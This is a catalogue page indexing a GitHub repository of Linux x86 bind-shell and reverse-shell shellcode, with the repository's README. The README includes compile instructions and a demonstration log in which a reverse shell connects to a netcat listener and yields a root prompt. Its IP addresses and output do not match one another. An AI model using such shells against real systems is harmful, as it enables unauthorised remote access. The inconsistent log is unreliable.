An open API service indexing awesome lists of open source software.

https://github.com/ajayos/linux-x86

Linux/x86 - Shell (/bin/sh)
https://github.com/ajayos/linux-x86

ajay-o-s ajay-os linux-x86-shellcode reverse-engineering x86

Last synced: about 2 months ago
JSON representation

Linux/x86 - Shell (/bin/sh)

Awesome Lists containing this project

README

        

# [Linux-x86](./README.md)
## Linux/x86 - Shell (/bin/sh)

# ***Tree***
---
# Linux-x86
# ╔═════════╩═════════╗
# [Bind-Shellcode](Bind-Shellcode/README.md)                        [Reverse-Shell](Reverse-Shell/README.md)
# ╔══════╩══════╗                ╔══════╩══════╗
## [Bind-Shellcode.c](Bind-Shellcode/Bind-Shellcode.c)         [Bind-Shellcode.asm](Bind-Shellcode/Bind-Shellcode.asm)         [Reverse-Shell.c](Reverse-Shell/Reverse-Shell.c)         [Reverse-Shell.asm](Reverse-Shell/Reverse-Shell.asm)

---

# [Bind-Shellcode](Bind-Shellcode/README.md)

# Linux-x86/Bind-Shellcode
## Linux-x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)

---

# [Reverse-Shell](Reverse-Shell/README.md)

## Linux-x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)

# Linux-x86/Reverse-Shell

Linux/x86 Reverse TCP Shell with dynamic IP and port binding Shellcode (tested on Ubuntu 12.04 LTS)
Usage: gcc -z execstack -o shell_reverse_tcp shell_reverse_tcp.c
$ ./shell_reverse_tcp_shellcode 192.168.1.286 4443
Connecting to 192.168.1.198 (0xec01a8c0):4443 (0x115c)
Byte 26: c0
Byte 27: a8
Byte 28: 01
Byte 29: ec

$ nc -nlv 4443
Listening on 0.0.0.0 4443
Connection received on 192.168.1.286 45219
id
uid=0(root) gid=0(root) groups=0(root)es)